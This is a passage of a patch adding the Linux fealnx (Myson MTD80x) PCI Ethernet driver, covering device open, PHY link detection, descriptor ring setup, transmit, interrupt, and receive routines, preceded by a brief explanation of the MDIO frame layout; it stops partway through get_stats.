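For reference, the 16-bit management frame that m80x_send_cmd_to_phy() shifts out MSB-first has the standard clause-22 layout, which is why the opcodes decode the way they do:

  /*
   *   ST(2) | OP(2) | PHYAD(5) | REGAD(5) | TA(2)
   *
   * OP_READ  = 0x6000 = 01 10 00000 00000 00  (TA turned around by the PHY)
   * OP_WRITE = 0x5002 = 01 01 00000 00000 10
   *
   * data = opcode | (phyad << 7) | (regad << 2) drops the two address
   * fields into the zeroed slots, matching the code above.
   */
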
++
++
++static int netdev_open(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	const int irq = np->pci_dev->irq;
++	int rc, i;
++
++	iowrite32(0x00000001, ioaddr + BCR);	/* Reset */
++
++	rc = request_irq(irq, intr_handler, IRQF_SHARED, dev->name, dev);
++	if (rc)
++		return -EAGAIN;
++
++	for (i = 0; i < 3; i++)
++		iowrite16(((const unsigned short *)dev->dev_addr)[i],
++				ioaddr + PAR0 + i*2);
++
++	init_ring(dev);
++
++	iowrite32(np->rx_ring_dma, ioaddr + RXLBA);
++	iowrite32(np->tx_ring_dma, ioaddr + TXLBA);
++
++	/* Initialize other registers. */
++	/* Configure the PCI bus bursts and FIFO thresholds.
++	   486: Set 8 longword burst.
++	   586: no burst limit.
++	   Burst length 5:3
++	   0 0 0   1
++	   0 0 1   4
++	   0 1 0   8
++	   0 1 1   16
++	   1 0 0   32
++	   1 0 1   64
++	   1 1 0   128
++	   1 1 1   256
++	   Wait the specified 50 PCI cycles after a reset by initializing
++	   Tx and Rx queues and the address filter list.
++	   FIXME (Ueimor): optimistic for alpha + posted writes ? */
++
++	np->bcrvalue = 0x10;	/* little-endian, 8 burst length */
++#ifdef __BIG_ENDIAN
++	np->bcrvalue |= 0x04;	/* big-endian */
++#endif
++
++#if defined(__i386__) && !defined(MODULE) && !defined(CONFIG_UML)
++	if (boot_cpu_data.x86 <= 4)
++		np->crvalue = 0xa00;
++	else
++#endif
++		np->crvalue = 0xe00;	/* rx 128 burst length */
++
++
++// 89/12/29 add,
++// 90/1/16 modify,
++//   np->imrvalue=FBE|TUNF|CNTOVF|RBU|TI|RI;
++	np->imrvalue = TUNF | CNTOVF | RBU | TI | RI;
++	if (np->pci_dev->device == 0x891) {
++		np->bcrvalue |= 0x200;	/* set PROG bit */
++		np->crvalue |= CR_W_ENH;	/* set enhanced bit */
++		np->imrvalue |= ETI;
++	}
++	iowrite32(np->bcrvalue, ioaddr + BCR);
++
++	if (dev->if_port == 0)
++		dev->if_port = np->default_port;
++
++	iowrite32(0, ioaddr + RXPDR);
++// 89/9/1 modify,
++//   np->crvalue = 0x00e40001;    /* tx store and forward, tx/rx enable */
++	np->crvalue |= 0x00e40001;	/* tx store and forward, tx/rx enable */
++	np->mii.full_duplex = np->mii.force_media;
++	getlinkstatus(dev);
++	if (np->linkok)
++		getlinktype(dev);
++	__set_rx_mode(dev);
++
++	netif_start_queue(dev);
++
++	/* Clear and Enable interrupts by setting the interrupt mask. */
++	iowrite32(FBE | TUNF | CNTOVF | RBU | TI | RI, ioaddr + ISR);
++	iowrite32(np->imrvalue, ioaddr + IMR);
++
++	if (debug)
++		printk(KERN_DEBUG "%s: Done netdev_open().\n", dev->name);
++
++	/* Set the timer to check for link beat. */
++	timer_setup(&np->timer, netdev_timer, 0);
++	np->timer.expires = RUN_AT(3 * HZ);
++
++	/* timer handler */
++	add_timer(&np->timer);
++
++	timer_setup(&np->reset_timer, reset_timer, 0);
++	np->reset_timer_armed = 0;
++	return rc;
++}
++
++
++static void getlinkstatus(struct net_device *dev)
++/* function: Routine will read MII Status Register to get link status.       */
++/* input   : dev... pointer to the adapter block.                            */
++/* output  : none.                                                           */
++{
++	struct netdev_private *np = netdev_priv(dev);
++	unsigned int i, DelayTime = 0x1000;
++
++	np->linkok = 0;
++
++	if (np->PHYType == MysonPHY) {
++		for (i = 0; i < DelayTime; ++i) {
++			if (ioread32(np->mem + BMCRSR) & LinkIsUp2) {
++				np->linkok = 1;
++				return;
++			}
++			udelay(100);
++		}
++	} else {
++		for (i = 0; i < DelayTime; ++i) {
++			if (mdio_read(dev, np->phys[0], MII_BMSR) & BMSR_LSTATUS) {
++				np->linkok = 1;
++				return;
++			}
++			udelay(100);
++		}
++	}
++}
++
++
++static void getlinktype(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++
++	if (np->PHYType == MysonPHY) {	/* 3-in-1 case */
++		if (ioread32(np->mem + TCRRCR) & CR_R_FD)
++			np->duplexmode = 2;	/* full duplex */
++		else
++			np->duplexmode = 1;	/* half duplex */
++		if (ioread32(np->mem + TCRRCR) & CR_R_PS10)
++			np->line_speed = 1;	/* 10M */
++		else
++			np->line_speed = 2;	/* 100M */
++	} else {
++		if (np->PHYType == SeeqPHY) {	/* this PHY is SEEQ 80225 */
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], MIIRegister18);
++			if (data & SPD_DET_100)
++				np->line_speed = 2;	/* 100M */
++			else
++				np->line_speed = 1;	/* 10M */
++			if (data & DPLX_DET_FULL)
++				np->duplexmode = 2;	/* full duplex mode */
++			else
++				np->duplexmode = 1;	/* half duplex mode */
++		} else if (np->PHYType == AhdocPHY) {
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], DiagnosticReg);
++			if (data & Speed_100)
++				np->line_speed = 2;	/* 100M */
++			else
++				np->line_speed = 1;	/* 10M */
++			if (data & DPLX_FULL)
++				np->duplexmode = 2;	/* full duplex mode */
++			else
++				np->duplexmode = 1;	/* half duplex mode */
++		}
++/* 89/6/13 add, (begin) */
++		else if (np->PHYType == MarvellPHY) {
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], SpecificReg);
++			if (data & Full_Duplex)
++				np->duplexmode = 2;	/* full duplex mode */
++			else
++				np->duplexmode = 1;	/* half duplex mode */
++			data &= SpeedMask;
++			if (data == Speed_1000M)
++				np->line_speed = 3;	/* 1000M */
++			else if (data == Speed_100M)
++				np->line_speed = 2;	/* 100M */
++			else
++				np->line_speed = 1;	/* 10M */
++		}
++/* 89/6/13 add, (end) */
++/* 89/7/27 add, (begin) */
++		else if (np->PHYType == Myson981) {
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], StatusRegister);
++
++			if (data & SPEED100)
++				np->line_speed = 2;
++			else
++				np->line_speed = 1;
++
++			if (data & FULLMODE)
++				np->duplexmode = 2;
++			else
++				np->duplexmode = 1;
++		}
++/* 89/7/27 add, (end) */
++/* 89/12/29 add */
++		else if (np->PHYType == LevelOnePHY) {
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], SpecificReg);
++			if (data & LXT1000_Full)
++				np->duplexmode = 2;	/* full duplex mode */
++			else
++				np->duplexmode = 1;	/* half duplex mode */
++			data &= SpeedMask;
++			if (data == LXT1000_1000M)
++				np->line_speed = 3;	/* 1000M */
++			else if (data == LXT1000_100M)
++				np->line_speed = 2;	/* 100M */
++			else
++				np->line_speed = 1;	/* 10M */
++		}
++		np->crvalue &= (~CR_W_PS10) & (~CR_W_FD) & (~CR_W_PS1000);
++		if (np->line_speed == 1)
++			np->crvalue |= CR_W_PS10;
++		else if (np->line_speed == 3)
++			np->crvalue |= CR_W_PS1000;
++		if (np->duplexmode == 2)
++			np->crvalue |= CR_W_FD;
++	}
++}
++
++
++/* Take lock before calling this */
++static void allocate_rx_buffers(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++
++	/*  allocate skb for rx buffers */
++	while (np->really_rx_count != RX_RING_SIZE) {
++		struct sk_buff *skb;
++
++		skb = netdev_alloc_skb(dev, np->rx_buf_sz);
++		if (skb == NULL)
++			break;	/* Better luck next round. */
++
++		while (np->lack_rxbuf->skbuff)
++			np->lack_rxbuf = np->lack_rxbuf->next_desc_logical;
++
++		np->lack_rxbuf->skbuff = skb;
++		np->lack_rxbuf->buffer = dma_map_single(&np->pci_dev->dev,
++							skb->data,
++							np->rx_buf_sz,
++							DMA_FROM_DEVICE);
++		np->lack_rxbuf->status = RXOWN;
++		++np->really_rx_count;
++	}
++}
++
++
++static void netdev_timer(struct timer_list *t)
++{
++	struct netdev_private *np = from_timer(np, t, timer);
++	struct net_device *dev = np->mii.dev;
++	void __iomem *ioaddr = np->mem;
++	int old_crvalue = np->crvalue;
++	unsigned int old_linkok = np->linkok;
++	unsigned long flags;
++
++	if (debug)
++		printk(KERN_DEBUG "%s: Media selection timer tick, status %8.8x "
++		       "config %8.8x.\n", dev->name, ioread32(ioaddr + ISR),
++		       ioread32(ioaddr + TCRRCR));
++
++	spin_lock_irqsave(&np->lock, flags);
++
++	if (np->flags == HAS_MII_XCVR) {
++		getlinkstatus(dev);
++		if ((old_linkok == 0) && (np->linkok == 1)) {	/* we need to detect the media type again */
++			getlinktype(dev);
++			if (np->crvalue != old_crvalue) {
++				stop_nic_rxtx(ioaddr, np->crvalue);
++				iowrite32(np->crvalue, ioaddr + TCRRCR);
++			}
++		}
++	}
++
++	allocate_rx_buffers(dev);
++
++	spin_unlock_irqrestore(&np->lock, flags);
++
++	np->timer.expires = RUN_AT(10 * HZ);
++	add_timer(&np->timer);
++}
++
++
++/* Take lock before calling */
++/* Reset chip and disable rx, tx and interrupts */
++static void reset_and_disable_rxtx(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	int delay=51;
++
++	/* Reset the chip's Tx and Rx processes. */
++	stop_nic_rxtx(ioaddr, 0);
++
++	/* Disable interrupts by clearing the interrupt mask. */
++	iowrite32(0, ioaddr + IMR);
++
++	/* Reset the chip to erase previous misconfiguration. */
++	iowrite32(0x00000001, ioaddr + BCR);
++
++	/* Ueimor: wait for 50 PCI cycles (and flush posted writes btw).
++	   We surely wait too long (address+data phase). Who cares? */
++	while (--delay) {
++		ioread32(ioaddr + BCR);
++		rmb();
++	}
++}
++
++
++/* Take lock before calling */
++/* Restore chip after reset */
++static void enable_rxtx(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++
++	reset_rx_descriptors(dev);
++
++	iowrite32(np->tx_ring_dma + ((char*)np->cur_tx - (char*)np->tx_ring),
++		ioaddr + TXLBA);
++	iowrite32(np->rx_ring_dma + ((char*)np->cur_rx - (char*)np->rx_ring),
++		ioaddr + RXLBA);
++
++	iowrite32(np->bcrvalue, ioaddr + BCR);
++
++	iowrite32(0, ioaddr + RXPDR);
++	__set_rx_mode(dev); /* changes np->crvalue, writes it into TCRRCR */
++
++	/* Clear and Enable interrupts by setting the interrupt mask. */
++	iowrite32(FBE | TUNF | CNTOVF | RBU | TI | RI, ioaddr + ISR);
++	iowrite32(np->imrvalue, ioaddr + IMR);
++
++	iowrite32(0, ioaddr + TXPDR);
++}
++
++
++static void reset_timer(struct timer_list *t)
++{
++	struct netdev_private *np = from_timer(np, t, reset_timer);
++	struct net_device *dev = np->mii.dev;
++	unsigned long flags;
++
++	printk(KERN_WARNING "%s: resetting tx and rx machinery\n", dev->name);
++
++	spin_lock_irqsave(&np->lock, flags);
++	np->crvalue = np->crvalue_sv;
++	np->imrvalue = np->imrvalue_sv;
++
++	reset_and_disable_rxtx(dev);
++	/* works for me without this:
++	reset_tx_descriptors(dev); */
++	enable_rxtx(dev);
++	netif_start_queue(dev); /* FIXME: or netif_wake_queue(dev); ? */
++
++	np->reset_timer_armed = 0;
++
++	spin_unlock_irqrestore(&np->lock, flags);
++}
++
++
++static void fealnx_tx_timeout(struct net_device *dev, unsigned int txqueue)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	unsigned long flags;
++	int i;
++
++	printk(KERN_WARNING
++	       "%s: Transmit timed out, status %8.8x, resetting...\n",
++	       dev->name, ioread32(ioaddr + ISR));
++
++	{
++		printk(KERN_DEBUG "  Rx ring %p: ", np->rx_ring);
++		for (i = 0; i < RX_RING_SIZE; i++)
++			printk(KERN_CONT " %8.8x",
++			       (unsigned int) np->rx_ring[i].status);
++		printk(KERN_CONT "\n");
++		printk(KERN_DEBUG "  Tx ring %p: ", np->tx_ring);
++		for (i = 0; i < TX_RING_SIZE; i++)
++			printk(KERN_CONT " %4.4x", np->tx_ring[i].status);
++		printk(KERN_CONT "\n");
++	}
++
++	spin_lock_irqsave(&np->lock, flags);
++
++	reset_and_disable_rxtx(dev);
++	reset_tx_descriptors(dev);
++	enable_rxtx(dev);
++
++	spin_unlock_irqrestore(&np->lock, flags);
++
++	netif_trans_update(dev); /* prevent tx timeout */
++	dev->stats.tx_errors++;
++	netif_wake_queue(dev); /* or .._start_.. ?? */
++}
++
++
++/* Initialize the Rx and Tx rings, along with various 'dev' bits. */
++static void init_ring(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	int i;
++
++	/* initialize rx variables */
++	np->rx_buf_sz = (dev->mtu <= 1500 ? PKT_BUF_SZ : dev->mtu + 32);
++	np->cur_rx = &np->rx_ring[0];
++	np->lack_rxbuf = np->rx_ring;
++	np->really_rx_count = 0;
++
++	/* initialize the rx descriptors */
++	for (i = 0; i < RX_RING_SIZE; i++) {
++		np->rx_ring[i].status = 0;
++		np->rx_ring[i].control = np->rx_buf_sz << RBSShift;
++		np->rx_ring[i].next_desc = np->rx_ring_dma +
++			(i + 1)*sizeof(struct fealnx_desc);
++		np->rx_ring[i].next_desc_logical = &np->rx_ring[i + 1];
++		np->rx_ring[i].skbuff = NULL;
++	}
++
++	/* for the last rx descriptor */
++	np->rx_ring[i - 1].next_desc = np->rx_ring_dma;
++	np->rx_ring[i - 1].next_desc_logical = np->rx_ring;
++
++	/* allocate skbs for the rx buffers */
++	for (i = 0; i < RX_RING_SIZE; i++) {
++		struct sk_buff *skb = netdev_alloc_skb(dev, np->rx_buf_sz);
++
++		if (skb == NULL) {
++			np->lack_rxbuf = &np->rx_ring[i];
++			break;
++		}
++
++		++np->really_rx_count;
++		np->rx_ring[i].skbuff = skb;
++		np->rx_ring[i].buffer = dma_map_single(&np->pci_dev->dev,
++						       skb->data,
++						       np->rx_buf_sz,
++						       DMA_FROM_DEVICE);
++		np->rx_ring[i].status = RXOWN;
++		np->rx_ring[i].control |= RXIC;
++	}
++
++	/* initialize tx variables */
++	np->cur_tx = &np->tx_ring[0];
++	np->cur_tx_copy = &np->tx_ring[0];
++	np->really_tx_count = 0;
++	np->free_tx_count = TX_RING_SIZE;
++
++	for (i = 0; i < TX_RING_SIZE; i++) {
++		np->tx_ring[i].status = 0;
++		/* do we need np->tx_ring[i].control = XXX; ?? */
++		np->tx_ring[i].next_desc = np->tx_ring_dma +
++			(i + 1)*sizeof(struct fealnx_desc);
++		np->tx_ring[i].next_desc_logical = &np->tx_ring[i + 1];
++		np->tx_ring[i].skbuff = NULL;
++	}
++
++	/* for the last tx descriptor */
++	np->tx_ring[i - 1].next_desc = np->tx_ring_dma;
++	np->tx_ring[i - 1].next_desc_logical = &np->tx_ring[0];
++}
++
++
++static netdev_tx_t start_tx(struct sk_buff *skb, struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	unsigned long flags;
++
++	spin_lock_irqsave(&np->lock, flags);
++
++	np->cur_tx_copy->skbuff = skb;
++
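++	/* one_buffer selects the single-descriptor transmit path below; the
++	 * compiled-out two_buffer path would split frames larger than BPT
++	 * bytes across two descriptors.
++	 */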
++#define one_buffer
++#define BPT 1022
++#if defined(one_buffer)
++	np->cur_tx_copy->buffer = dma_map_single(&np->pci_dev->dev, skb->data,
++						 skb->len, DMA_TO_DEVICE);
++	np->cur_tx_copy->control = TXIC | TXLD | TXFD | CRCEnable | PADEnable;
++	np->cur_tx_copy->control |= (skb->len << PKTSShift);	/* pkt size */
++	np->cur_tx_copy->control |= (skb->len << TBSShift);	/* buffer size */
++// 89/12/29 add,
++	if (np->pci_dev->device == 0x891)
++		np->cur_tx_copy->control |= ETIControl | RetryTxLC;
++	np->cur_tx_copy->status = TXOWN;
++	np->cur_tx_copy = np->cur_tx_copy->next_desc_logical;
++	--np->free_tx_count;
++#elif defined(two_buffer)
++	if (skb->len > BPT) {
++		struct fealnx_desc *next;
++
++		/* for the first descriptor */
++		np->cur_tx_copy->buffer = dma_map_single(&np->pci_dev->dev,
++							 skb->data, BPT,
++							 DMA_TO_DEVICE);
++		np->cur_tx_copy->control = TXIC | TXFD | CRCEnable | PADEnable;
++		np->cur_tx_copy->control |= (skb->len << PKTSShift);	/* pkt size */
++		np->cur_tx_copy->control |= (BPT << TBSShift);	/* buffer size */
++
++		/* for the last descriptor */
++		next = np->cur_tx_copy->next_desc_logical;
++		next->skbuff = skb;
++		next->control = TXIC | TXLD | CRCEnable | PADEnable;
++		next->control |= (skb->len << PKTSShift);	/* pkt size */
++		next->control |= ((skb->len - BPT) << TBSShift);	/* buf size */
++// 89/12/29 add,
++		if (np->pci_dev->device == 0x891)
++			np->cur_tx_copy->control |= ETIControl | RetryTxLC;
++		next->buffer = dma_map_single(&np->pci_dev->dev,
++					      skb->data + BPT, skb->len - BPT,
++					      DMA_TO_DEVICE);
++
++		next->status = TXOWN;
++		np->cur_tx_copy->status = TXOWN;
++
++		np->cur_tx_copy = next->next_desc_logical;
++		np->free_tx_count -= 2;
++	} else {
++		np->cur_tx_copy->buffer = dma_map_single(&np->pci_dev->dev,
++							 skb->data, skb->len,
++							 DMA_TO_DEVICE);
++		np->cur_tx_copy->control = TXIC | TXLD | TXFD | CRCEnable | PADEnable;
++		np->cur_tx_copy->control |= (skb->len << PKTSShift);	/* pkt size */
++		np->cur_tx_copy->control |= (skb->len << TBSShift);	/* buffer size */
++// 89/12/29 add,
++		if (np->pci_dev->device == 0x891)
++			np->cur_tx_copy->control |= ETIControl | RetryTxLC;
++		np->cur_tx_copy->status = TXOWN;
++		np->cur_tx_copy = np->cur_tx_copy->next_desc_logical;
++		--np->free_tx_count;
++	}
++#endif
++
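++	/* Keep a margin of two free descriptors, since the two_buffer path
++	 * can consume two descriptors per packet.
++	 */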
++	if (np->free_tx_count < 2)
++		netif_stop_queue(dev);
++	++np->really_tx_count;
++	iowrite32(0, np->mem + TXPDR);
++
++	spin_unlock_irqrestore(&np->lock, flags);
++	return NETDEV_TX_OK;
++}
++
++
++/* Take lock before calling */
++/* Chip probably hosed tx ring. Clean up. */
++static void reset_tx_descriptors(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	struct fealnx_desc *cur;
++	int i;
++
++	/* initialize tx variables */
++	np->cur_tx = &np->tx_ring[0];
++	np->cur_tx_copy = &np->tx_ring[0];
++	np->really_tx_count = 0;
++	np->free_tx_count = TX_RING_SIZE;
++
++	for (i = 0; i < TX_RING_SIZE; i++) {
++		cur = &np->tx_ring[i];
++		if (cur->skbuff) {
++			dma_unmap_single(&np->pci_dev->dev, cur->buffer,
++					 cur->skbuff->len, DMA_TO_DEVICE);
++			dev_kfree_skb_any(cur->skbuff);
++			cur->skbuff = NULL;
++		}
++		cur->status = 0;
++		cur->control = 0;	/* needed? */
++		/* probably not needed. We do it for purely paranoid reasons */
++		cur->next_desc = np->tx_ring_dma +
++			(i + 1)*sizeof(struct fealnx_desc);
++		cur->next_desc_logical = &np->tx_ring[i + 1];
++	}
++	/* for the last tx descriptor */
++	np->tx_ring[TX_RING_SIZE - 1].next_desc = np->tx_ring_dma;
++	np->tx_ring[TX_RING_SIZE - 1].next_desc_logical = &np->tx_ring[0];
++}
++
++
++/* Take lock and stop rx before calling this */
++static void reset_rx_descriptors(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	struct fealnx_desc *cur = np->cur_rx;
++	int i;
++
++	allocate_rx_buffers(dev);
++
++	for (i = 0; i < RX_RING_SIZE; i++) {
++		if (cur->skbuff)
++			cur->status = RXOWN;
++		cur = cur->next_desc_logical;
++	}
++
++	iowrite32(np->rx_ring_dma + ((char*)np->cur_rx - (char*)np->rx_ring),
++		np->mem + RXLBA);
++}
++
++
++/* The interrupt handler does all of the Rx thread work and cleans up
++   after the Tx thread. */
++static irqreturn_t intr_handler(int irq, void *dev_instance)
++{
++	struct net_device *dev = (struct net_device *) dev_instance;
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	long boguscnt = max_interrupt_work;
++	unsigned int num_tx = 0;
++	int handled = 0;
++
++	spin_lock(&np->lock);
++
++	iowrite32(0, ioaddr + IMR);
++
++	do {
++		u32 intr_status = ioread32(ioaddr + ISR);
++
++		/* Acknowledge all of the current interrupt sources ASAP. */
++		iowrite32(intr_status, ioaddr + ISR);
++
++		if (debug)
++			printk(KERN_DEBUG "%s: Interrupt, status %4.4x.\n", dev->name,
++			       intr_status);
++
++		if (!(intr_status & np->imrvalue))
++			break;
++
++		handled = 1;
++
++// 90/1/16 delete,
++//
++//      if (intr_status & FBE)
++//      {   /* fatal error */
++//          stop_nic_tx(ioaddr, 0);
++//          stop_nic_rx(ioaddr, 0);
++//          break;
++//      };
++
++		if (intr_status & TUNF)
++			iowrite32(0, ioaddr + TXPDR);
++
++		if (intr_status & CNTOVF) {
++			/* missed pkts */
++			dev->stats.rx_missed_errors +=
++				ioread32(ioaddr + TALLY) & 0x7fff;
++
++			/* crc error */
++			dev->stats.rx_crc_errors +=
++			    (ioread32(ioaddr + TALLY) & 0x7fff0000) >> 16;
++		}
++
++		if (intr_status & (RI | RBU)) {
++			if (intr_status & RI)
++				netdev_rx(dev);
++			else {
++				stop_nic_rx(ioaddr, np->crvalue);
++				reset_rx_descriptors(dev);
++				iowrite32(np->crvalue, ioaddr + TCRRCR);
++			}
++		}
++
++		while (np->really_tx_count) {
++			long tx_status = np->cur_tx->status;
++			long tx_control = np->cur_tx->control;
++
++			if (!(tx_control & TXLD)) {	/* this pkt spans two tx descriptors */
++				struct fealnx_desc *next;
++
++				next = np->cur_tx->next_desc_logical;
++				tx_status = next->status;
++				tx_control = next->control;
++			}
++
++			if (tx_status & TXOWN)
++				break;
++
++			if (!(np->crvalue & CR_W_ENH)) {
++				if (tx_status & (CSL | LC | EC | UDF | HF)) {
++					dev->stats.tx_errors++;
++					if (tx_status & EC)
++						dev->stats.tx_aborted_errors++;
++					if (tx_status & CSL)
++						dev->stats.tx_carrier_errors++;
++					if (tx_status & LC)
++						dev->stats.tx_window_errors++;
++					if (tx_status & UDF)
++						dev->stats.tx_fifo_errors++;
++					if ((tx_status & HF) && np->mii.full_duplex == 0)
++						dev->stats.tx_heartbeat_errors++;
++
++				} else {
++					dev->stats.tx_bytes +=
++					    ((tx_control & PKTSMask) >> PKTSShift);
++
++					dev->stats.collisions +=
++					    ((tx_status & NCRMask) >> NCRShift);
++					dev->stats.tx_packets++;
++				}
++			} else {
++				dev->stats.tx_bytes +=
++				    ((tx_control & PKTSMask) >> PKTSShift);
++				dev->stats.tx_packets++;
++			}
++
++			/* Free the original skb. */
++			dma_unmap_single(&np->pci_dev->dev,
++					 np->cur_tx->buffer,
++					 np->cur_tx->skbuff->len,
++					 DMA_TO_DEVICE);
++			dev_consume_skb_irq(np->cur_tx->skbuff);
++			np->cur_tx->skbuff = NULL;
++			--np->really_tx_count;
++			if (np->cur_tx->control & TXLD) {
++				np->cur_tx = np->cur_tx->next_desc_logical;
++				++np->free_tx_count;
++			} else {
++				np->cur_tx = np->cur_tx->next_desc_logical;
++				np->cur_tx = np->cur_tx->next_desc_logical;
++				np->free_tx_count += 2;
++			}
++			num_tx++;
++		}		/* end of while loop */
++
++		if (num_tx && np->free_tx_count >= 2)
++			netif_wake_queue(dev);
++
++		/* read transmit status for enhanced mode only */
++		if (np->crvalue & CR_W_ENH) {
++			long data;
++
++			data = ioread32(ioaddr + TSR);
++			dev->stats.tx_errors += (data & 0xff000000) >> 24;
++			dev->stats.tx_aborted_errors +=
++				(data & 0xff000000) >> 24;
++			dev->stats.tx_window_errors +=
++				(data & 0x00ff0000) >> 16;
++			dev->stats.collisions += (data & 0x0000ffff);
++		}
++
++		if (--boguscnt < 0) {
++			printk(KERN_WARNING "%s: Too much work at interrupt, "
++			       "status=0x%4.4x.\n", dev->name, intr_status);
++			if (!np->reset_timer_armed) {
++				np->reset_timer_armed = 1;
++				np->reset_timer.expires = RUN_AT(HZ/2);
++				add_timer(&np->reset_timer);
++				stop_nic_rxtx(ioaddr, 0);
++				netif_stop_queue(dev);
++				/* or netif_tx_disable(dev); ?? */
++				/* Prevent other paths from enabling tx,rx,intrs */
++				np->crvalue_sv = np->crvalue;
++				np->imrvalue_sv = np->imrvalue;
++				np->crvalue &= ~(CR_W_TXEN | CR_W_RXEN); /* or simply = 0? */
++				np->imrvalue = 0;
++			}
++
++			break;
++		}
++	} while (1);
++
++	/* read the tally counters */
++	/* missed pkts */
++	dev->stats.rx_missed_errors += ioread32(ioaddr + TALLY) & 0x7fff;
++
++	/* crc error */
++	dev->stats.rx_crc_errors +=
++		(ioread32(ioaddr + TALLY) & 0x7fff0000) >> 16;
++
++	if (debug)
++		printk(KERN_DEBUG "%s: exiting interrupt, status=%#4.4x.\n",
++		       dev->name, ioread32(ioaddr + ISR));
++
++	iowrite32(np->imrvalue, ioaddr + IMR);
++
++	spin_unlock(&np->lock);
++
++	return IRQ_RETVAL(handled);
++}
++
++
++/* This routine is logically part of the interrupt handler, but separated
++   for clarity and better register allocation. */
++static int netdev_rx(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++
++	/* If EOP is set on the next entry, it's a new packet. Send it up. */
++	while (!(np->cur_rx->status & RXOWN) && np->cur_rx->skbuff) {
++		s32 rx_status = np->cur_rx->status;
++
++		if (np->really_rx_count == 0)
++			break;
++
++		if (debug)
++			printk(KERN_DEBUG "  netdev_rx() status was %8.8x.\n", rx_status);
++
++		if ((!((rx_status & RXFSD) && (rx_status & RXLSD))) ||
++		    (rx_status & ErrorSummary)) {
++			if (rx_status & ErrorSummary) {	/* there was a fatal error */
++				if (debug)
++					printk(KERN_DEBUG
++					       "%s: Receive error, Rx status %8.8x.\n",
++					       dev->name, rx_status);
++
++				dev->stats.rx_errors++;	/* end of a packet. */
++				if (rx_status & (LONGPKT | RUNTPKT))
++					dev->stats.rx_length_errors++;
++				if (rx_status & RXER)
++					dev->stats.rx_frame_errors++;
++				if (rx_status & CRC)
++					dev->stats.rx_crc_errors++;
++			} else {
++				int need_to_reset = 0;
++				int desno = 0;
++
++				if (rx_status & RXFSD) {	/* this pkt is too long, spanning more than one rx buffer */
++					struct fealnx_desc *cur;
++
++					/* check whether this packet was received completely */
++					cur = np->cur_rx;
++					while (desno <= np->really_rx_count) {
++						++desno;
++						if ((!(cur->status & RXOWN)) &&
++						    (cur->status & RXLSD))
++							break;
++						/* goto next rx descriptor */
++						cur = cur->next_desc_logical;
++					}
++					if (desno > np->really_rx_count)
++						need_to_reset = 1;
++				} else	/* RXLSD not found, something is wrong */
++					need_to_reset = 1;
++
++				if (need_to_reset == 0) {
++					int i;
++
++					dev->stats.rx_length_errors++;
++
++					/* free all rx descriptors related to this long pkt */
++					for (i = 0; i < desno; ++i) {
++						if (!np->cur_rx->skbuff) {
++							printk(KERN_DEBUG
++								"%s: I'm scared\n", dev->name);
++							break;
++						}
++						np->cur_rx->status = RXOWN;
++						np->cur_rx = np->cur_rx->next_desc_logical;
++					}
++					continue;
++				} else {        /* rx error, need to reset this chip */
++					stop_nic_rx(ioaddr, np->crvalue);
++					reset_rx_descriptors(dev);
++					iowrite32(np->crvalue, ioaddr + TCRRCR);
++				}
++				break;	/* exit the while loop */
++			}
++		} else {	/* this received pkt is ok */
++
++			struct sk_buff *skb;
++			/* Omit the four octet CRC from the length. */
++			short pkt_len = ((rx_status & FLNGMASK) >> FLNGShift) - 4;
++
++#ifndef final_version
++			if (debug)
++				printk(KERN_DEBUG "  netdev_rx() normal Rx pkt length %d"
++				       " status %x.\n", pkt_len, rx_status);
++#endif
++
++			/* Check if the packet is long enough to accept without copying
++			   to a minimally-sized skbuff. */
++			if (pkt_len < rx_copybreak &&
++			    (skb = netdev_alloc_skb(dev, pkt_len + 2)) != NULL) {
++				skb_reserve(skb, 2);	/* 16 byte align the IP header */
++				dma_sync_single_for_cpu(&np->pci_dev->dev,
++							np->cur_rx->buffer,
++							np->rx_buf_sz,
++							DMA_FROM_DEVICE);
++				/* Call copy + cksum if available. */
++
++#if ! defined(__alpha__)
++				skb_copy_to_linear_data(skb,
++					np->cur_rx->skbuff->data, pkt_len);
++				skb_put(skb, pkt_len);
++#else
++				skb_put_data(skb, np->cur_rx->skbuff->data,
++					     pkt_len);
++#endif
++				dma_sync_single_for_device(&np->pci_dev->dev,
++							   np->cur_rx->buffer,
++							   np->rx_buf_sz,
++							   DMA_FROM_DEVICE);
++			} else {
++				dma_unmap_single(&np->pci_dev->dev,
++						 np->cur_rx->buffer,
++						 np->rx_buf_sz,
++						 DMA_FROM_DEVICE);
++				skb_put(skb = np->cur_rx->skbuff, pkt_len);
++				np->cur_rx->skbuff = NULL;
++				--np->really_rx_count;
++			}
++			skb->protocol = eth_type_trans(skb, dev);
++			netif_rx(skb);
++			dev->stats.rx_packets++;
++			dev->stats.rx_bytes += pkt_len;
++		}
++
++		np->cur_rx = np->cur_rx->next_desc_logical;
++	}			/* end of while loop */
++
++	/* allocate skbs for the rx buffers */
++	allocate_rx_buffers(dev);
++
++	return 0;
++}
++
++
++static struct net_device_stats *get_stats(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++
++	/* The chip only needs to report frames it silently dropped. */
++	if (netif_running(dev)) {
++		dev->stats.rx_missed_errors +=
++			ioread32(ioaddr + TALLY) & 0x7fff;
++		dev->stats.rx_crc_errors +=
